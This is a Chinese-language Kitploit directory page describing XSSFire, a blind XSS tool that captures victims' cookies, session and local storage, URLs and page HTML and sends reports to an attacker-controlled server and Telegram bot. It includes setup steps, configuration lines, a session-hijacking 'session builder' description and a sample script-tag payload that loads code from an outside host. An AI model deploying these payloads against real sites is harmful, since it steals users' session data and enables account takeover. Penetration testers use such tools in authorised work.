Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
XSSFire — A standalone Blind XSS Script. | Kitploit
工具/GitHubGitHub/seifelsallamy/xssfire
ExploitationWeb Application ExploitationData ExfiltrationInformation GatheringWeb SecurityPenetration Testing
GitHubseifelsallamy/xssfire

XSSFire

A standalone Blind XSS Script.

查看仓库
47101年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

XSSFire

一个独立的 Blind XSS 脚本。

工作原理:

该脚本是 PHP 和 JavaScript 的结合体,它使用 JS 捕获数据并将其发送到脚本本身,然后生成报告文件并通过 Telegram 传递。

要求:

  1. 运行在 Linux 上的 Web 服务器,需要域名和 SSL 证书。
  2. Telegram 账户(用于接收 BXSS 报告)

为什么选择 Telegram?

易于设置。 快速。 可达性好。

功能:

  1. 捕获:IP、User-Agent、日期时间、Local Storage、Session Storage、Cookies、Referrer、Origin、URL、HTML,以及是否从 Iframe 触发。
  2. 会话构建器:一个可以重建会话的 JavaScript,打开捕获的 URL 和开发者工具,然后将其粘贴到控制台并按回车。如果你足够幸运,你就能接管该会话。
  3. Telegram 通知:比电子邮件更快、更容易设置,且更易触达。
  4. 防垃圾通知:每个捕获的 URL 你只会收到一/两条通知。不过,脚本会定期重置,以便稍后再次通知你。
  5. 加密:你可以在脚本中设置密码,你在 Telegram 中收到的报告将是一个受密码保护的 zip 文件。(Telegram 机器人不使用端到端加密)。
  6. HTML 快照:一个随报告一起交付的 HTML 文件,它应当与目标页面看起来相似。

设置:

  1. 前往 Telegram 并与 @botfather 对话。
  2. 在聊天中发送 /start 并创建新机器人。
  3. 创建机器人时,你应该会收到你的机器人令牌。
  4. 将令牌保存在一边。
  5. 现在前往你新建的机器人聊天窗口,启动它然后打个招呼。
  6. 然后访问:https://api.telegram.org/bot<bot_token>/getUpdates
  7. 并保存你的聊天 ID。
  8. 打开 XSSFire 脚本并修改以下行:
root@kitploit:~
$chat_id = "<Telegram Chat ID>"; // Your Telegram Chat ID
$token = "<Telegram Bot Access Token>"; // Your telegram Bot Access token
$password = False; //Protect the Blind XSS Report with a password. Leave as False if not used.
  1. 将脚本上传到你的服务器。

要生成 payload,你可以考虑使用 Blind-XSS-Manager https://github.com/SeifElsallamy/Blind-XSS-Manager 你可以通过这个扩展轻松创建 payload,只需在域名字段中输入 yourdomain.com/<脚本路径> 并点击保存。

注意:你可以将文件名改为 index.php 并上传到服务器的主目录,以缩短 payload,此时 payload 应类似于 <script src="https://yourdomain.com"></script>。

截图:

bxss bxss2 bxss3

感谢 GPT-3 xD

下载工具